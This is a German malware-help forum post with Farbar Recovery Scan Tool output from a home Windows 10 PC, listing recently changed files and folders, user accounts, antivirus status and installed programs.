2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-11-11 07:45 - 2019-12-07 10:18 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-11-11 07:45 - 2019-12-07 10:18 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-11-11 07:10 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\servicing
2020-11-11 07:10 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-11-11 07:05 - 2017-12-02 01:07 - 000000000 ____D C:\WINDOWS\system32\MRT
2020-11-11 07:03 - 2017-12-02 01:07 - 133736600 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2020-11-11 04:29 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\appcompat
2020-11-10 11:16 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2020-11-10 11:16 - 2017-12-02 13:41 - 000000000 ____D C:\Users\Tom\AppData\Local\Packages
2020-11-10 11:00 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Registration
2020-11-10 11:00 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\USOPrivate
2020-11-10 11:00 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2020-11-10 11:00 - 2018-07-03 15:27 - 000000000 ____D C:\ProgramData\Packages
2020-11-10 11:00 - 2017-12-02 13:41 - 000000000 ___RD C:\Users\Tom\3D Objects
2020-11-10 10:59 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2020-11-10 10:57 - 2018-05-02 06:16 - 000023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2020-11-10 10:54 - 2019-12-28 14:50 - 000000000 ____D C:\temp
2020-11-10 10:54 - 2017-12-02 07:33 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2020-11-10 10:54 - 2017-12-01 17:41 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2020-11-10 10:54 - 2017-12-01 17:41 - 000000000 ____D C:\WINDOWS\system32\DAX2
2020-11-10 10:53 - 2020-10-17 18:46 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenAudible
2020-11-10 10:53 - 2020-08-31 10:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2020-11-10 10:53 - 2020-05-13 21:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2020-11-10 10:53 - 2020-05-13 16:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2020-11-10 10:53 - 2020-03-30 12:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MozBackup
2020-11-10 10:53 - 2020-02-25 22:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2020-11-10 10:53 - 2020-02-21 11:55 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2020-11-10 10:53 - 2020-02-13 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Medal B.V
2020-11-10 10:53 - 2020-02-10 15:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedCommander 17 (x64)
2020-11-10 10:53 - 2020-01-11 18:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\T16 Wired Gaming Mouse
2020-11-10 10:53 - 2019-12-07 10:14 - 000028672 _____ C:\WINDOWS\system32\config\BCD-Template
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 __RHD C:\Users\Public\Libraries
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioDatabase
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\spool
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\NDF
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Help
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2020-11-10 10:53 - 2019-11-04 12:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RV-Print 2.0
2020-11-10 10:53 - 2019-10-07 11:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ProgTV 2 (x64)
2020-11-10 10:53 - 2019-08-26 16:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ant Renamer
2020-11-10 10:53 - 2019-08-25 17:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced Renamer
2020-11-10 10:53 - 2019-08-23 08:30 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startfenster-Replace
2020-11-10 10:53 - 2019-08-21 23:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Anthem™
2020-11-10 10:53 - 2019-07-19 18:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Krita
2020-11-10 10:53 - 2019-06-19 11:04 - 000000000 ____D C:\Program Files\UNP
2020-11-10 10:53 - 2019-06-17 20:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Drakonia Black
2020-11-10 10:53 - 2019-04-05 07:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarMoney 12 Basic
2020-11-10 10:53 - 2019-03-23 13:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WAF-Programme
2020-11-10 10:53 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2020-11-10 10:53 - 2018-10-05 17:33 - 000000000 ___RD C:\Program Files\Microsoft Games
2020-11-10 10:53 - 2018-10-05 17:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2020-11-10 10:53 - 2018-10-05 09:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mein CEWE FOTOBUCH
2020-11-10 10:53 - 2018-10-05 09:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lidl-Fotos
2020-11-10 10:53 - 2018-07-03 17:01 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2018-04-17 15:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Das Telefonbuch Gelbe Seiten Map & Route
2020-11-10 10:53 - 2018-04-14 19:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LEGO Company
2020-11-10 10:53 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\MsDtc
2020-11-10 10:53 - 2018-03-04 18:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plex Media Server
2020-11-10 10:53 - 2018-01-20 16:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\News File Grabber
2020-11-10 10:53 - 2017-12-27 17:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-11-10 10:53 - 2017-12-27 17:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-11-10 10:53 - 2017-12-16 14:28 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pokémon Trading Card Game Online
2020-11-10 10:53 - 2017-12-11 12:29 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2017-12-10 20:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hauppauge WinTV
2020-11-10 10:53 - 2017-12-10 12:52 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Phase 5 HTML-Editor
2020-11-10 10:53 - 2017-12-09 21:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2017-12-05 20:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Command and Conquer The Ultimate Collection Additional Content
2020-11-10 10:53 - 2017-12-05 20:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood Chat
2020-11-10 10:53 - 2017-12-05 19:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood Online
2020-11-10 10:53 - 2017-12-04 22:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Biet-O-Matic
2020-11-10 10:53 - 2017-12-04 20:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2020-11-10 10:53 - 2017-12-03 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarMoney 11
2020-11-10 10:53 - 2017-12-03 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft
2020-11-10 10:53 - 2017-12-03 13:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2020-11-10 10:53 - 2017-12-02 17:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Synology
2020-11-10 10:53 - 2017-12-02 07:33 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2020-11-10 10:53 - 2017-12-02 01:11 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\QuickPar
2020-11-10 10:53 - 2017-12-02 01:10 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SABnzbd
2020-11-10 10:53 - 2017-12-02 01:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ghostscript
2020-11-10 10:53 - 2017-12-02 00:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2020-11-10 10:53 - 2017-12-02 00:34 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2020-11-10 10:53 - 2017-12-02 00:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2020-11-10 10:53 - 2017-12-02 00:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\calibre 64bit - E-book Management
2020-11-10 10:53 - 2017-12-02 00:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyPhoneExplorer
2020-11-10 10:53 - 2017-12-01 23:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack
2020-11-10 10:53 - 2017-12-01 23:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IrfanView
2020-11-10 10:53 - 2017-12-01 21:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedCommander 16 (x64)
2020-11-10 10:53 - 2017-09-29 14:46 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2020-11-10 10:52 - 2019-12-07 10:18 - 000000000 ____D C:\WINDOWS\Setup
2020-11-10 09:46 - 2020-02-27 21:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashIntegro
2020-11-10 09:46 - 2019-12-07 20:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-11-10 09:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Resources
2020-11-10 09:46 - 2019-07-18 18:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2020-11-10 09:46 - 2018-10-12 11:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2020-11-10 09:46 - 2018-09-07 15:33 - 000000000 ____D C:\WINDOWS\system32\Drivers\NVIDIA Corporation
2020-11-10 09:46 - 2018-04-11 16:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com
2020-11-10 09:46 - 2017-12-01 17:41 - 000000000 ____D C:\Program Files\Realtek
2020-11-10 09:46 - 2017-12-01 17:40 - 000000000 ____D C:\Program Files\Intel
2020-11-10 09:45 - 2020-02-27 20:14 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackmagic Design
2020-11-10 09:45 - 2017-12-04 21:58 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\migwiz
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2020-11-10 09:42 - 2019-12-07 15:54 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\OEMDefaultAssociations.dll
2020-11-10 09:42 - 2019-12-07 15:54 - 000020908 _____ C:\WINDOWS\system32\OEMDefaultAssociations.xml
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ___SD C:\WINDOWS\system32\AppV
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\appraiser
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\DiagTrack
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Common Files\System
2020-11-10 09:36 - 2019-12-07 15:53 - 000000000 ____D C:\WINDOWS\OCR
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\winrm
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\WCN
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\slmgr
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\dsc
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2020-11-10 09:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2020-11-10 09:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\MUI
2020-11-06 22:05 - 2020-07-12 16:42 - 000000877 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000865 _____ C:\Users\Public\Desktop\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000865 _____ C:\ProgramData\Desktop\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Notepad++
2020-11-06 14:19 - 2018-02-25 10:17 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-11-05 22:37 - 2017-12-02 13:42 - 000000000 ____D C:\Users\Tom\AppData\Local\PlaceholderTileLogoFolder

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2020-02-27 21:21 - 2020-02-27 21:42 - 150155571 _____ () C:\Program Files\video_editor_642.zip
2020-02-27 21:23 - 2020-02-20 13:43 - 070052768 _____ (Flash-Integro LLC                                          ) C:\Program Files\video_editor_x32.exe
2020-02-27 21:23 - 2020-02-20 13:43 - 080208568 _____ (Flash-Integro LLC                                          ) C:\Program Files\video_editor_x64.exe
2020-11-28 19:48 - 2020-12-02 22:24 - 000061440 _____ () C:\Users\Tom\AppData\Roaming\cookies.sqlite
2018-02-25 11:07 - 2020-07-30 10:09 - 000006656 _____ () C:\Users\Tom\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-07-19 18:42 - 2020-02-10 16:43 - 000012780 _____ () C:\Users\Tom\AppData\Local\krita.log
2020-02-10 16:43 - 2020-02-10 16:43 - 000000039 _____ () C:\Users\Tom\AppData\Local\kritadisplayrc
2019-07-19 18:42 - 2019-07-19 18:44 - 000014167 _____ () C:\Users\Tom\AppData\Local\kritarc
2020-01-25 13:06 - 2020-01-25 13:06 - 000000859 _____ () C:\Users\Tom\AppData\Local\recently-used.xbel

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

Rupsi 02.12.2020 22:28
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2020
durchgeführt von Tom (02-12-2020 22:25:31)
Gestartet von C:\Users\Tom\Desktop
Windows 10 Pro Version 2004 19041.630 (X64) (2020-11-10 10:00:01)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3451750051-380284315-2914928687-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3451750051-380284315-2914928687-503 - Limited - Disabled)
Gast (S-1-5-21-3451750051-380284315-2914928687-501 - Limited - Disabled)
Tom (S-1-5-21-3451750051-380284315-2914928687-1002 - Administrator - Enabled) => C:\Users\Tom
Tom_Admin (S-1-5-21-3451750051-380284315-2914928687-1001 - Administrator - Enabled) => C:\Users\Tom_Admin
Vincent (S-1-5-21-3451750051-380284315-2914928687-1003 - Limited - Enabled) => C:\Users\Vincent
WDAGUtilityAccount (S-1-5-21-3451750051-380284315-2914928687-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

4K YouTube to MP3 3.7 (HKLM-x32\...\{C4B2ABD0-F2D6-47C6-B1BE-320A060A5485}) (Version: 3.7.0.2852 - Open Media LLC)
7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20066 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 32.0.0.125 - Adobe)
Advanced Renamer (HKLM-x32\...\Advanced Renamer_is1) (Version: 3.85 - Hulubulu Software)
ANT Drivers Installer x64 (HKLM\...\{16BA964D-698D-4663-8FA7-B9613DA7958B}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Ant Renamer (HKLM-x32\...\Ant Renamer 2_is1) (Version: 2.12.0 - Ant Software)
Anthem™ (HKLM-x32\...\{57b4eaa0-f1f5-407e-afbd-2db397381ad8}) (Version: 1.0.64.24016 - Electronic Arts)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Biet-O-Matic v2.14.14 (HKLM-x32\...\Biet-O-Matic v2.14.14) (Version: 2.14.14 - BOM Development Team)
BQ Firmware Flash Tool version 3.0.4 (HKLM-x32\...\{58946287-F553-4D93-AC53-8296836A500A}_is1) (Version: 3.0.4 - Mundo Reader S.L.)
calibre 64bit (HKLM\...\{3BB5C110-3153-47C8-B845-AA5F57C3C0A7}) (Version: 4.14.0 - Kovid Goyal)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.8.7128 - CDBurnerXP)
Command & Conquer™ The Ultimate Collection Additional Content (HKLM-x32\...\{1A882F29-BC18-4AC2-A71E-0FC30FA32568}) (Version: 1.0.0.0 - Electronic Arts)
Command & Conquer™: Generals and Zero Hour (HKLM-x32\...\{609F6FD5-4B22-4D7A-AD30-8C9DD480D5BE}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Das Telefonbuch Gelbe Seiten Map & Route (HKLM-x32\...\DasTelefonbuch Gelbe Seiten Map & Route) (Version:  - TVG Telefonbuch- und Verzeichnisverlag GmbH & Co. KG)
DaVinci Resolve (HKLM\...\{5913037B-95C8-4A27-8F37-026BBC7B5AF1}) (Version: 16.1.2026 - Blackmagic Design)
Destiny 2 (HKLM-x32\...\Destiny 2) (Version:  - Blizzard Entertainment)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 416.34 - NVIDIA Corporation) Hidden
Drakonia Black (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version:  - )
DVBViewer Pro (HKLM-x32\...\DVBViewer Pro_is1) (Version: 6.0.4 - CM&V)
Elevated Installer (HKLM-x32\...\{877496C2-70B0-42F1-835A-FAFE2CF0199C}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
Epic Games Launcher (HKLM-x32\...\{AF7881ED-41D7-4ECA-8C7C-AE10DFA0E489}) (Version: 1.1.151.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
eSupport UndeletePlus 3.0.8.322 (HKLM-x32\...\eSupport UndeletePlus_is1) (Version:  - Copyright © 2015 eSupport.com • All Rights Reserved)
Gameforge Client (HKLM-x32\...\{d3b2a0c1-f0d0-4888-ae0b-1c5e1febdafb}_is1) (Version: 2.1.12.165 - Gameforge)
Garmin Express (HKLM-x32\...\{235f2ee5-7383-44df-a298-01221caa5532}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{E944FA32-8BCF-474F-BFB2-D1EF24555873}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
GIMP 2.10.14 (HKLM\...\GIMP-2_is1) (Version: 2.10.14 - The GIMP Team)
Google Earth Pro (HKLM-x32\...\{59F21DFB-6977-434B-9CB9-67783D6E7B6B}) (Version: 7.3.3.7786 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.22) (Version: 9.22 - Artifex Software Inc.)
Hauppauge WinTV 8 (HKLM-x32\...\Hauppauge WinTV 8) (Version: v8.0.35159 (CD 5.6) - Hauppauge Computer Works)
IrfanView 4.50 (64-bit) (HKLM\...\IrfanView64) (Version: 4.50 - Irfan Skiljan)
Java 10.0.2 (64-bit) (HKLM\...\{EECB2736-D013-5AC5-9917-7656712F6931}) (Version: 10.0.2.0 - Oracle Corporation)
Java 8 Update 251 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180251F0}) (Version: 8.0.2510.8 - Oracle Corporation)
Java(TM) SE Development Kit 12.0.2 (64-bit) (HKLM\...\{3FA68A00-9C88-5E69-870A-B40CB89DC2EF}) (Version: 12.0.2.0 - Oracle Corporation)
K-Lite Mega Codec Pack 14.9.4 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.9.4 - KLCP)
Krita (x64) 4.2.3 (HKLM\...\Krita_x64) (Version: 4.2.3.0 - Krita Foundation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LEGO Digital Designer (HKLM-x32\...\New LEGO Digital Designer) (Version:  - LEGO A/S)
Lidl Fotos (HKLM-x32\...\{FDABC3E8-59D0-4B9E-B181-4597DD6B4B74}_is1) (Version:  - Lidl DE)
Malwarebytes version 4.2.3.96 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.3.96 - Malwarebytes)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.3.6 - CEWE Stiftung u Co. KGaA)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.52 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft Office FrontPage 2003 (HKLM-x32\...\{90170409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2019 - de-de (HKLM\...\ProPlus2019Retail - de-de) (Version: 16.0.13328.20356 - Microsoft Corporation)
